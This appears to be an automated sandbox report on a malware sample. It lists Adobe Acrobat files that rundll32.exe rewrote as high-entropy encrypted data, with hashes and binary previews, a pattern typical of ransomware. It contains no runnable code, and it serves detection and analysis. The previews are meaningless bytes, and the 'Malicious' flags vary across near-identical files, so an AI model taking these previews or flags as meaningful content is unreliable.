                                              Preview:..:.=A.+...,..V...t..B..].(..C3....._..i.4.5.7./....H....#_.OR(=.=...kB.........;0...Y$F^.~....N...5..H.../.....F.s...d.j..a4.C.e....-.B.^.:."p.x)e2..........-.k(K....=...zF.5.`K..Qx..MJ}\.5M>A...".u.V...[...m.+.h.=k.F..2.^..,2.....v....:...Iy.....i.Y..d..i....y.e.^..>W}.4..q$.z.e...W.q.......{.$.c..K.^......F.[+a.NX!......?.@.U&G&K17."..L..;]......;9ML=r...:j.,.?70..sH.....|.A.C@.k..4....&.Bmw'.%{-.&.u.s...i..(.%..!.:..m5~.(y..d.%.7?Y.u3..Y......L.w..8..|.A...0..{........@..sn=)..U...Q.k....<x5...?.........f.h%t...s=....O..0.k....Hi...Q.v.!....-0<......T...{.%...9..$m.3;..X....-......e...!....y.H..0 ....%D......>.Qm.a@..J......|....q1..O.FYMu4.p.L.....X....O..T5.<vl.h.y......CU~..9.:...K -.xv...9...".'..bmRW..u.Nx.....?:.[$.L...\.n.<x......W6+.:/.J..*......4 ...%.|.n.A..........N.{...NB..K.....T.^..a.H..-.......s.]n.@..dw.k.{.2.%...t?...X.".}B....n.-r...,.y.7x...6..z...O.......U.,.tp.b..L..|......M.'.i[t...^F..wt..U..`a.we.x.3;...QE"..

                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Bus Schedule.pdf

                                              Download File
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:OpenPGP Secret Key
                                              Category:dropped
                                              Size (bytes):938128
                                              Entropy (8bit):7.999782758623809
                                              Encrypted:true
                                              SSDEEP:24576:e9QVFx1rN59Lbh1akuuAk/Oh3RDMBeZwnR5:f7xrh1akuic3dMBeZwR5
                                              MD5:7615B74372672EE1FB159AA6B0259CDC
                                              SHA1:C44609A7F9064FD7F41BEEC3286B6E82AE5B89EF
                                              SHA-256:6D9AC68FD729FECAC87042389FF0C3F6BD6B45B290558A97C9497048109B7F34
                                              SHA-512:EEAE456F48F647D0A6A3554F2D691D8609E0055F1713FB0B37C1A9447287BE6F60C3A1F019D3CB0A7F47693CF2A81140238FF08587A48F60194885777AA03264
                                              Malicious:false
                                              Preview:..:.=A.+...,..V`...q...>.....dI./m....2D.3...K.1O......<..........cv.......$^R"3....p0y.7.&5...4jt....Z.\I.B.0.L!..".%K..-.N-#...w...........c..Q5.'...6g..$..^.@|...\F@..gL.a..1o.Y..r..F.....;.=..:....X......4.q...g9T?......u._.C.<q...$...._8.j..[..k......J-\ ~......$.dp.,`W1...<...\.zo...f...w...`..M.Ch.q..........r.|...?G.IX.R#={.6...j....R.U..it ~.R.%_X.UO.....X...8...*.*X.p..){..,.n....O....^~........E....V.TcM^....0...).......1.f3.q.?..'..Pw..-.<.N.K.r....^.qF.<v..F......!P5i.3.-*s..S.1....4...1...~/.F{..Q.....^.j........B"2...m.-T"........L] ..DsK....oC.. ..l.."N...B^..j.`....M..I.~.M.9..._/.>q.......b......<D8.0TE..D.#......?...".+.w.Y.p.-.y..(.*...e.q.K.9......kI...N.. .=. &BfG....h.a.D.F...:D.\-..3.D..Z.=..:g.?`...Iv..w?;...B...:.>;..@....+IX.C;t...T....U...E/Tr~..J......H..<4..f....8...n.T..D(D.......[..W.............g.k..b..KRA ..U....!..m<...p`..m,......q..$iR<.1.K|E.~.....T..4......]..e9.E....b.'..).u.`..Zk.[|.[.k..\..

                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Complex Machine.pdf

                                              Download File
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):181440
                                              Entropy (8bit):7.998937323768341
                                              Encrypted:true
                                              SSDEEP:3072:0VnYUlpm11h+/EvjvVm8UhGwsQWd4YGCh9sJ7+PqTgkjhVpZOIuqW9YKYc+GSegm:oll6tvRJUhGwsQWmo0+AgkjhnQzYK1gm
                                              MD5:904E09576D498F7CF5F710D43CD9DC83
                                              SHA1:196925E106B1D719A8B8022EFFFAAABFA7D8D255
                                              SHA-256:3327F4C54CCBF3C662075BDC8B008048C2B39E3E8EECADA0A26DE16806E788DF
                                              SHA-512:9E387AC747AA05298225C3B3CA5E0DC98552404FD828BEBB80D5E0502A28032356BCA670F4F8DF5F98902522C5FC4ED4B6DF701DDFDA52E3388BFEAE32367870
                                              Malicious:false
                                              Preview:.5R.n.$....P.^.;...g.U....l&...K....$a.....Q......p.QQ...(..Id?.p3m.Oaa...~r.:]...b.G...?.U..L....n......2).,...W`7.p.M00.e..S..^..."5.<.lU.y........x....B.g....$F(....QW4rz.z.En!...FM"g|.@.....y.o@K#...|z\.duB...AL.j.R.<!..m...L...2........P.M.....}.S.k.)...[..xZ\.x..Y.??.........\..B#...6..~...%.;...+)>...E..R...~..p..u8..xU.a....`.auq7.....]..)<M.uh..cb....d..L.;v.%..g.!...B......9...4>...+.(.e..r.q..y3.)z.k.%....x..%...].H.KW4.Zy.....~Y@.....c....q...k2...W..|.Wy).a.s..-.#B@.X..I....p..F.].. [....8..s..[(..|......~.....XSe.....?f. ..Gy.2..?..B.......Xd...).y+.I..U/?..h..C....?.i3n....#.W........=.r.O.;I..{U1...E.i....)..4..P@..X!.hRR...a.......q3....C.iY...iV:..{=...;..P.g[...H.[?..b...o..D..@..1w.j.N.MT.4a........dQl.N..+..a.&-..CkmI#0.{.:...8...S.......S...@$@.u..KP?......y....z...5..|..t.?=.C...A9/8...n........._..........j.9..7.f)..@A..G.F.K?.$...%.J._ax..H.t./z1......F......S..^..?B.L:...3.....il......Z.)._...h...*.d.n.

                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe

                                              Download File
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):42464
                                              Entropy (8bit):7.996551625428287
                                              Encrypted:true
                                              SSDEEP:768:2WeM9Yis1QE8C3DOzpXbF/KIdu2/wU5jdaxwb9Gnu5VV2f+F:coYi2PyzpL4x2YU5js+Cuh
                                              MD5:8DEB52E38E88FE88E9F9B68B5AD4F068
                                              SHA1:01DAFE4ECD356E8B7C2C396C721F53073F13985F
                                              SHA-256:46F039535DD91FD96B0F864038E21CDA11DD36F3F94883B9C819C293E64AAC86
                                              SHA-512:6928CED62A0F0E087E5CB2D71E785BA0210332D8C8F793BAF1A0B99F93EE2B8CBF83084D9E1648BF57154494ED1219D05305BCA2A3EC3E5F036A84E200CB6AB7
                                              Malicious:true
                                              Preview:]..'.6^...2.[..J .M...........L5.v$.......W...>......p..c..:M...o.>.h.....u5.K...4Al.vv8..L.}.B&.t7.~.....v..#Vb.M.H8UF...(cY...(...Q.UA....T.<.A+Jrw...l^...k..A,.p.a.%...]..m";.C..>mQ.l..l..ya.*....%/..o.z..m.....'9.lk..;Z.{4.E..&.....x.t.....e.%..B.........B..T....M.S.a._.....!.!...&{...Q.f>/.....@....{...]......e..:..2....;{.......^......PG.$v....B![3C...9...0(.&$`.l.0...SDF[.|...I E.%L.f=......g...9.....x..y.2|..<7.Hi.`.%S.U.eR((*......N0..9....Yf....dP...P(.b3....&M.]...5#...'P..._..Jf}...s.$.F....)..:^........@.ib..y._4.Wh...v....^....{.NI._CW.E.M...... .z..^S.Y.-f_.?....B.-_.8..M....S.rR..z....6...|.7..}...........f.P.sK}...Q(.....b>.....J._.ce..~wz5m..L..4.r3.!KP.xq....@.<O.x..z.5..@dR...Pp..G...v....U.f.vv.I/.a;L.$&{s.G.ZSS..X..$.4...l......$.(".w.!$...;.. ......J....J..(..t..Ny;.....yS.....J.sXrZ.e....".]...^....5.".....+..f......S....|M.rW..kun.q.t.2....i6..w.nO.y0..KWX{.>..c.S.`T'U..W....3.B.......o...+T.*,Y..."U..

                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\cr_win_client_config.cfg

                                              Download File
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):208
                                              Entropy (8bit):7.041503900708577
                                              Encrypted:false
                                              SSDEEP:3:FpvzaiybHdhvuDDHQNp55oPqfBxEBQlkHBgOs0rp7NMdHeUIbmv6PB6fXxWxDy4C:TvzpybSXQNxlb0rp7gHeUIyiQidWP
                                              MD5:00A0C2920AFAB3E9857A1F9323EF8449
                                              SHA1:D3BA27E1582D1A955D6CAF28417DECE2571F694D
                                              SHA-256:225F7B4E55743291C58C6A1383617623D8123A5CD02FA36E8134DB0E8B01CF4D
                                              SHA-512:3B5A9E05800C697D295581786AFDEFC309123C3124154C92DA10AF0FDEA3C71D6EDDD980404011BD5A4BE10E698F66920BFEF5D7B6A99218C73C829217C7C2AE
                                              Malicious:false
                                              Preview:...J........d.U.+.....Ava!29.....|..U-.X..b&y.hL..5.5..s..O.....E.hO..L.......c.T..x..."..5".....b8I|.\....j..^y'o.!i........=...x/.,v...........2b.;(.Z.k>.6dW...w.................T...}..A......Y..w..

                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\CompareMarkers.pdf

                                              Download File
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):22352
                                              Entropy (8bit):7.992679755500086
                                              Encrypted:true
                                              SSDEEP:384:Y29Xa8TZFvjpc3CMSVz+V1e0/hUqm6UIo5AuwpNiXBV1sxqTdYFlNWlWTUVyr/:15jTK3CGdhRm6UQucqpYFlN+fO/
                                              MD5:BDAED882A47BBCFF7839B8DC9E72B2BF
                                              SHA1:B2756BBC169827564AF893606D2C9EA42ACFBD09
                                              SHA-256:3D206B43789C07F88981F15F57A0899FF9F3FFB1E5CBBEC77966FCDF88486DD9
                                              SHA-512:D9D97BF3A7E745212F91FFF86DA94F0ECBA417F46706629EA1ACFD9A4B2C4413CE085B37058176C91D3153B865A0FD4850F9579E899DCB46DEFD9467327D37FC
                                              Malicious:false
                                              Preview:...F.`.D.....`b......>..}.F.(.......JQ.....ha....V.?.t=.....}...v....;Id../......C......F...>:...E's......~7y.8.In.qdhX3IU....f..W...8D..I...=m....#.....;.1..jm.....n......m.SXI..%,..v?......t....S.}E..v0..a.....$..r...s.....R&..h4.+....k.S...1|..g.UT..7..um......y.K.+..Mx..."{........E3.S...O.......K.i1..O....._...jN..J..,..V8"@...V@w..q=.m.<.9....~,&..5.X.#?.. `..X8s.'....>.....`t....t.b..q*3..o1..].;..[._i(^.Pb&..B..........r.~..$...pcF..7..x$..J._...pcR)..],..........K..(.....j..#....Y./Rk..g1.u...0..A..~U_......g..)..K../.....).!.&6.....#8.....dk..i....&.X_..`.!.W..a./.%.....K.aj.........$z.....&K.C+.Q3.4F.i.,...b.&.\......./.!.j..Q..."..1V..S.o.......Q..t........(5....A.k.d........ii+....(...'.C...FZC...R.1.."..,....D........@......7........b..:......IJ..K..W1OQ.@<.5.(]...jn.....g.J..\.......h..Y.r...u.`bs|<..1..V...]]..94.R7f.%.3Q.n.t.w.].i.#....s....cB.@..L......q^....W.9...c..O.kr.e.~%..A.e[).X.8.Y..!.*..}.x-O ..U.RWt..k..+

                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf

                                              Download File
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):57232
                                              Entropy (8bit):7.997099953454312
                                              Encrypted:true
                                              SSDEEP:768:7vcU72AxxkcnKyBR+FoLWcrlFgv1zQpqOHdpjKplHDVX3R+yxULFfj9TO3:QATkcnHiSWo0zTOHdh6ZJR+h9To
                                              MD5:DE8AAAC1F747F8325F9156574726B2D0
                                              SHA1:233F12A89BC2193C37B4A7C631A4CF6AE41CD9A2
                                              SHA-256:344AAB23665328B2E9F7628430F27F98EE70D4B1C022C9ACEBCB1D3BDCA382EC
                                              SHA-512:27DF29695F118F14AFDEFCEEF22166E0E0F504B4566E8D7D8B379C0BCB0C78BC4FEDA2CF540D8B08790937B3E1806B00B491FFBB51B5A19DDF12F53006C53214
                                              Malicious:false
                                              Preview:...F.`.D.....`b....C..v%....7N%8.S...j......=.{....._.f....._.f.L...nLX.7....&;~.....w5...#..sK....a.<<...Z.W...x7...F...(..}...O.U...v^..&.6.@.JBn...l..I.6....]...x.h.....'...9..t....;...x......Tb.........~(.q..>Y.._...g:..I./....].{s...Q.m...fxw.G#3.>......,Q...}...`ps.......xO!.0.... ;.R@.....*..St8r.I......:..\!.x....q.:..8........$.G\..:.f..}P..}.15!..aH.......Is.u...u*.....K)..T4.z..+U.h#$6q..Z!Gl...... .@v.s.y.Z.S];mZw..y.Zb9........DXK...V.6(\ cfG...a/0q.....*.&N..=....i.....q..Jc..Ja.3...$.......<...H.<......bL..$f%.....].,6.".%n.$.$..xC.$...h./T.AE.]......9.?.......[W.x..r...rCO..v..;a]:-...n..`.9i.&....i_\......ca.....Q\...&H....v...b.I...c.\L...k...B......~o.M..Er...bL.).@.\e...h_.I.x&.*.._.l.l%...E..D............&r....m;.;./.5%....\=R.x.G6Y.Z..A......I8..0x...k.4.a5.(@...@...l......Z......G..$Y.l...|.E?.J....o-.l.........Du.4"......y.n....z..a.....Uml...^...l5..H..z..5......H....|XK..;*rP.3.c...|Zrht'2..L.\N.C.H|C.}.<

                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\ENU\Faces.pdf

                                              Download File
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):33024
                                              Entropy (8bit):7.994447157042604
                                              Encrypted:true
                                              SSDEEP:768:LhMEyQp8wUJX28xLLXORe6oFI/C6i32KX:LSQp8trxHXlwJi32KX
                                              MD5:8B7A39EBCCBDD1496FDCC7A37FFF4B4D
                                              SHA1:654F181AC7CFB671098A423FB05D376746C845AA
                                              SHA-256:2F9BAC73DC71237B5909239DE832014662DA270B80FA4D46982271BD794DB9C7
                                              SHA-512:63A480E9D6D8983CC9223579ED8BB9C19A1D79E0CE6EBADA8A47AB1696D91A6672985E7A5AC2DC7C4CB9529730D7916C3D76C1337AE8459181496D7C07F2EFE6
                                              Malicious:false
                                              Preview:.5R.n.$....P.^.1.....y;....%(p..,...YP...}:.i.....$w\O...............U\...n.I.:.....qx.]Rd..&.9sD.......+. ..AQ/.........k.I\....=..}r.Odu.Z4L.....oL..xt.?....9.>Q.f.Y.}.5....%...... .=.../}4=...uvX. .Q.m........@..^O.a..J.m.3]...}<(.9:.....J._.......!.x:.g|)......TZ..|E..X.-..H6.8.T..n..E...y.ZK...R.3(...M.AT\...y..X..........Y!.ez...I...F.X..:....^&i'(...;./..U.*..:^LC!&..`a.@A.9q...%...............o..jS...<qy,..G?.l).[...o[>.....f>9...|..$.w....2qO..;F....85..1D.....P.._=``.CD.u.|.@.ylmy..'.=...c9.Dk..-e.W...m.[U3........P..q...p'........:9.:...L.m....&S,.2=........B....-.5./.....%..p...I!.x...Z..'..'.../V5.(a.>X.<...O...i..cr..3...rMeY.$..........uM.$w.@.....*#I.....r.5.U.wh......2r.......z@vN.X.\..=._i^..u....z5;.F6+.=.."h.....^..:.H!..8.6..Wl.v&w....=^.+.YM.@..J.i&.........i.r[..3..)...q~<G...p...aMv.....45rE..+8U....L..=..#.m..L..}E;.3.].w....C.S(.r...OE.m3,N.?.6@.q..Y.D(.Z.....}..*....j/.o.g*...cl../..f.!C..O

                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\ENU\Pointers.pdf

                                              Download File
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):46912
                                              Entropy (8bit):7.996409657551626
                                              Encrypted:true
                                              SSDEEP:768:35nxi+q0WxgzA8nVCsn/luqV29x1vPi00fheZOgDSKJTXCawZMbFkkrjyazadvet:35nAt0WqzvnZndto1vPi0Ihe06JTXGZc
                                              MD5:843BB773C8D1BA8223F0112DBD67839E
                                              SHA1:C9286E251C8D44B6977AAC6EA13B0CDC5B149D31
                                              SHA-256:9323CD9044BC2ED7C954B3F60DA385012E40526D9FF1D4C7D1FF2CF5B7173845
                                              SHA-512:EB18C9B32BD9AD0BBD4369BBF76B0FF912935C6CBD78A3FCB3F6DC2B75D28F6D9501FFDD7F1F6D9D6DE02B4196DA9E903C2EA6BCEA033B439E7E7CCB4644CF99
                                              Malicious:false
                                              Preview:.5R.n.$....P.^......tJPr...].;\u'.k.....].2.....o....\.J...'q..RP*w..V.....$....*.q;.E.I1.........z..4....<RVh{]e2.@.Sj..b.:..dzO.c.N... ,..r6a.......@.#.9......1...yL.J.Q6f.\..X......T...H...`......\z...!.+....E..z.YV..*.e...hL....0k%N.K...e8..45.t |......s.z.V?.?..W.".(2n......x.D..<......F~...[..wp.D[...w.8..{3f ......].=x....e....nY...^..@...E....M..q.....g..<L.~..a.O...... ..K$O.6......Y.W....7.+.N...j...V.{%U..O...'..Ka..p=.@.....|)?..p..l.c.[2.A[.U3\...Uk(d.I...bE.-0..a.r.:......'.r.a..!.Hu...."{YD.....zi.~.l5.c8`..^..jC.y.fzE... ....k...9.h..j...5b..k0i.^..Mj.<I.,.i.....?F.{....w....@.=...8...d(;V..ic."M.l.RY...2]......{bY._...3.8Hx.(T.\..|.bkx .q..6..}....RW.....)./.J.dK..{....-{..W.I...n.f_C{w.T.9w_............C.u=........D.....S...I.`.mx'KD..l.)v@k.O..j!..|....1u."h..g.6@.H.&%....P..O.3T....=.....$vZx...At....'k..5.KUFO..+...........N....zv...g.e.Z..S..3j]....../S..-htM..h5H;........|..7.....g3;..7wL\.i.]}.Q..4..].

                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\ENU\SignHere.pdf

                                              Download File
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):40736
                                              Entropy (8bit):7.995019203823994
                                              Encrypted:true
                                              SSDEEP:768:sR0uEZoveNwNIhWFkWVEE3HvtYnudgaln85Xi6lZeHOgFb1RJJPXEo:T2WhzWVVH2nygaSWugFzMo
                                              MD5:9EFCCF7A9833EAEC575BCCCECD69AA09
                                              SHA1:095EED709239DFECBC8F3D0BDA6FAAD8FEB55EDA
                                              SHA-256:F5ACF85FAE9A5694FA178E86936A0F1690742E0F127686677F8CB919CB7BE8A7
                                              SHA-512:88935F3EB94B80169EB9182C9D4275822A5880798704FB91DAE13E2709CD0047C99B162314439BB2DD5CF28001F97903F1D3DC1499EBC0CDE4C18D4BF55A5BE3
                                              Malicious:false
                                              Preview:.5R.n.$....P.^....ha.z...sc.9..~...m.L.+..*R.+dx....*=p.O.O.M.tP@Q.z[......G}.L..].W....sED..Do.o.C.......!.+...o..l~c.s. ......`d.x5.....Oh...p.l.....-@.Tr..Ap....@. .>A...<a.`.,.\...R...p...............'.JA...?........-..S3S..3.=.X6..Hc.4...[~.../+......R...v.}wU-.f.YDE........@.uT.....R...k.K.O.IF..)..j...6.=..u.sf.....\.......X...k. }#k...'....yb.....Ck.....&.i.!.p.!+Tks.dy.u_>.{.B...8......*k...O.x.;`......`..i...Q.e.u..~.S.....T...K.<).....5.b.u.ABR.r.Et..%o.'Qn6.;.J(F...g...`......w...TS0.!..3.F....|i`.._.s.J;\4......'.....M.......U7=...p..Z.w.d.....[......v.j.&k..n.7.A.Y.N.....f@].....=sd}.O".....nd..J..^o...i........rN...+.}..{...V..{.!...I...ghE+:L.|.......UfC](...Q...........$....$..w^)v.c4..`....I.w..v.h......:e.Q.C-R...f.".Z.S.....tK .U">`4....Vk0'WE..{Z.K.X2;..x..{..I....k ...0t>......p..T+.';e..L&;...S.^d....:D.L8.f..b......bu.C...^..I*a..Dkq.J..5i..(D....]...I..k...6.4.F..K..F.5q....(C...|....d...AF.h......"....

                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\ENU\Standard.pdf

                                              Download File
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):115968
                                              Entropy (8bit):7.998456850021704
                                              Encrypted:true
                                              SSDEEP:1536:1ZHMlQwazLPcZkyjmGEXsstvuHo4TF3DCyblsXIrFQhvZIxkYqaYfoxwyCJOqxNB:1Z3PJyZEqTF3DCR0FQhV5fJxyyaiV
                                              MD5:E2D5BEC0AC37F7B13A226659A3122FB0
                                              SHA1:08A679C84FFCACB93081BAA691C5D983DB1C9795
                                              SHA-256:93352B82CAE27427D005E95F857E23FB20B369A8812B716EF8976F031B0672EA
                                              SHA-512:C4BF8E41A46A757C8BED94443045989485E1B7A067666E8F36345FA595A0075AF84568CE0CEEF47589A6075781CC4C6A8BFE24D4862A3B209713188EE8D7EDEC
                                              Malicious:false
                                              Preview:..J..{....^.b.......|..o...M.c.W.....tO..S..s.R...gz.&Q..0FZ..p...@f4d..K..`...mH##._.u..........q.u....._x....Ic.".r..D..rM.9.K.d.*Y..u.X>...t...V!@.KJ.._.......`.Q...6Y....l...N(../...a....>._D.IT=u1.... tD.N6...z..%.>x=...k....i3.q...Yj....j...@Qx......)..|...w8...a..MY...$.&.D...e.y...B.@...v..g[....-/k[..=.......=TY.f.fKa.%...$.......).~.q...@..'./.`.-.....4.yv.....P....f!-9.q......._|....(.Z".&.......1..*...c"...0..].1@O...a."f..?_..S....a.&..#&%...T......2t.[.lz.......U.^yc./..llB....<..4$..y._....?..d..B.w.....f..GP(PG..L....n}.x.#..P....Qa.=.......G...;jo.c.......3.Xi....PmmR...4.>.F,gNE....r,.....$h..~..u.._.Q.~..lG.P5....f!t...w..m.D.....Q......W9...a.d.q........~hmS.T.&.~_.:`..u..]..M...../.....W.......F...3"...Lk..Xr;....[..A.E..j...u6.=&-|....y..Rn.N.a...4..7.<....y..k/}..B9.....[....8_..#9...j..bg.y.q.n..1..F(C..#p.}.....t..Y...P.G&.3...:S......@4.Ea...X.....T.k.:.......:...u.+..B..v....c..HX2.......~.....C ..i.5E...~.a...V.....y$T

                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf

                                              Download File
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):108768
                                              Entropy (8bit):7.998495117481608
                                              Encrypted:true
                                              SSDEEP:3072:vB2yhcs+uPGVoF22Hs9Y29ldD49kY5bE3n1TJTt4uWxnVv:52ydRF22haD4H5bElxt4Vx9
                                              MD5:73DDED8853B1908243DE87DB18DFC9FE
                                              SHA1:C858840B6F7295E514D2C5D48C8125CF8BA6CAB1
                                              SHA-256:CB9DB022203A877735A249D30182A47BF40089C9634B12BFB4AF3E3F32BC0CBC
                                              SHA-512:6CADC12CAD38933871A4046F0E9BA9893145567E72844660B264647FC6C5A2152EA295B627196E7654F00280784C1BB3D4A3C11049B519D1DC13E94F633559A4
                                              Malicious:false
                                              Preview:.5R.n.$....P.^.....!V.~>.(.f..P.L.S..!.^.i..^....0......=,.0...l...8.Q....I=.....5.1o..W^|...`.X.sA.f..?....m..p..p.......{..E.]...<}TA.c../.ZN.`..1..0w.@|.I~.%..6.z...8.(%|p../r@...=h....`....V..<V..........Cx.h.. .-.{.:;9.BU6..v!...(E.t.JkK';...W?...).......[.`..G .-.GaU.......^x.7.Y....s.....r......M.u#.|YT.3....7].....%y{.tS.7......D_v.....>z.._.EV.'b2.&>jm\?..r.....e...O......BI.Y.nd...KP....Vi..y` 4!j.[.%..T-.Q...nL....!...mB)+..pa.qE..o....y...........W.&........j5..+/W..)X...A..L.7-..9..R.&........#..7..". ]........e.....~7.d....*..(....L:._th.....>.[?o..`.r........|.Y.z.]`.w..2c.ZL^i.P.R/...?........../T]C.........D.6g<'q.,..W.9.....df.Y........'2....~S..E.........T.{..X.1...^....G.T2.. &..2.#...N...-4.....u4"lH.H....z#...c..4..bL.X.....lM\z.....K......u.n.<.S...jG.3;..5.|........^3.G,.p{.3P....1.........q4........b.0.N.t.E~.9.59.....Ai?.U........zkP..K.7._..,.d.0C......J)./.........QF7.."+....N._.wA.5.....4\%9..r|..V.Tm ......G

                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\Words.pdf

                                              Download File
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):112512
                                              Entropy (8bit):7.998592962688274
                                              Encrypted:true
                                              SSDEEP:3072:tbgnIB/iFSATl1QgPp1ifz2Hfdez0i5jODp:BsIN0Tl1zPp1ifzagz1j+p
                                              MD5:A7F17CE9E170A0189892FCF73FD6CA20
                                              SHA1:DA28409077F76CB05FE9F08DD3E83AB36126977C
                                              SHA-256:83A50B76BEC1CF6DED5D1ED7EA4AD68AA547345B3A67DAC2328FE87507277249
                                              SHA-512:3F1A563C5682FFEBCF58647F3591203C1ED6862C2AA70523D04387860D33615EC8B0C8E9834FDAE2B050F7A8EA83D267584292F61C687D9C8F30C662828A0F61
                                              Malicious:false
                                              Preview:.!.U..........q.J!\.....Z..(f%..1..X..Kt..o.Ck .\.......^w.H.f.&....qr..,.f.fM."O2l....8E.%.S.. mO*\....4r.e`...Tm..T..;.47.I...s....f..'./.f......'.`F.8R.....M.N..(+.78..6...~...*.../I.......8$...).5K9.p...3.....\.69.c..^.....s.O.*..{.B#.......]..60j.a..7..!..}..C...E\e...s...D.kj....'S.`'M+^}Q..X......M..>U...D...l......^..m_>rGC.7.4...._........\...0.FU%H..i.E...B...9.n.?K.O!.....~....y.b).R.V...b...1.i.....a.......G[.g]..../r...ZeYo...n.v..u...W.F.,%_..I....JD.r...9n].p..v..S>5.._.P.w...C....3|u.8..v?.........N.4.9..X^.\% .}...2..U.~1(..y|.....].\...wo.8...&..~8.....]7f.I.h.-6ro..0U......I..A.D@.+....3?k..%.K...2..p<vI....*).L..,.....Z.k""{BA....@0...7..Ot.Xo%..X....."....!....n....,4..J...&C..<M..>d.E...q.j..C.>....47:h|....O...{6..t.N.5.M..%..RVV;@>..../?..m.F..i}...L....g.............5.....&.B.9.xp........A`......[.....np.`.B....Zf.@.waH.........re..a...W.W.J.Y...>.8..h..a.x....NG.HZ..V..\1..W..c..>^....P.o.jt..(.bU#.a.L.../../.E

                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe

                                              Download File
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):110560
                                              Entropy (8bit):7.998286829647029
                                              Encrypted:true
                                              SSDEEP:3072:0B+jAn1ay4WD8V2lytfMIQksCpCr4e2Ue:01x4WD8sdt/qw4d
                                              MD5:82C74931DD7053EE7D699F368BBD3A47
                                              SHA1:80A8DE131D2AB3F85820BD424473C01C69EE936B
                                              SHA-256:ED9E1700EB8EF2CF25AD8A22F9A06DAD2676AE158361A3601799D9950F02F6C8
                                              SHA-512:AA4C9CA5E18744AE54F8C102BBB8F66E768C1A7FE67F378F8BBE9C5591F90ECA5A2B393950ED7E4812832667DE5A2A299625DFBF62EF25DA729085CACE70FDC4
                                              Malicious:true
                                              Preview:]..'.6^...2.[..J .M...........L5.v$........D....r.......b...q...D.%..s.hu!.Z.L{......B...d.U{y.....6#...]E..|l.:6........JH]./..]B...x......4..t..].Xi6...~.".vl.w._=:..'.;..nm...r.f.-.....l........&.&..w....@S.R.dyS.]x...|.6.......d..U.e...q..K.u*R7.....J..(.".6..b.R........&....."b.....I1.:..."...|...g...YE......f..e.M...*...,...W.I....2T..lJ.6d....@.._;V[.e...b.%.Z5E..d....o....g....6...V..E.*M_$l...e..W;.4j..p...}....K.~.#...H....B....s...o..+.Z.5Q.....4{'n...L.....[.^.......e..s.'?^..,4..............MeV..$2`....n2B.GV...~.R.U2lI.n=2C..v.z.v.{*.Z..G.$.A..m)5J...Z.7L^..X.<...%w.g.'....|Hk..i.S2X5.P4.>.....z9.F.rM.....(s.~CH.u.E...:.....U7.i..b9_.y3&^...1...........w&G.;.x....0*,c.o.#T...g.8..{1.E...b....M...G..`@A..gT....Cs.>.<Z..Z....S...7......<.1.M.At`.X....QEC..~.G.)1~..D......V|..c..,.i...; ...P....8p.>.X..?...C.].....&..5.|.=.f..RP..aZ.jD...C..&:....}.Qnd....S. .9...U.._b.........:C.;c&V..1..@.M....

                                              C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe

                                              Download File
                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):267232
                                              Entropy (8bit):7.999259844110794
                                              Encrypted:true
                                              SSDEEP:6144:t+u4yLW2WesVvLm/fS5OcF+59l4U70Jcny4F9Id2lbnE5o8FeW4b27jQSRg5s:t1zWeQHD8X0JQXIibnE5rPF7nJ
                                              MD5:3E627AA9997934875E2A4257727C5BB6
                                              SHA1:F8F6884C44ABD5DECC39D3401B54C35F3E3E3370
                                              SHA-256:320498A72269B128E598956F6C921D8CCCD58AC33B296C120D04F17ACD3FD4CA
                                              SHA-512:0917C1C6A6F43F4B8418C2256011001FEE1114B946697900094BC745FC37F9E4D6D3D691D51BFD90F0F65BF7289C8158663C49CE98F1992B5E842A654ECCD0A1
                                              Malicious:true
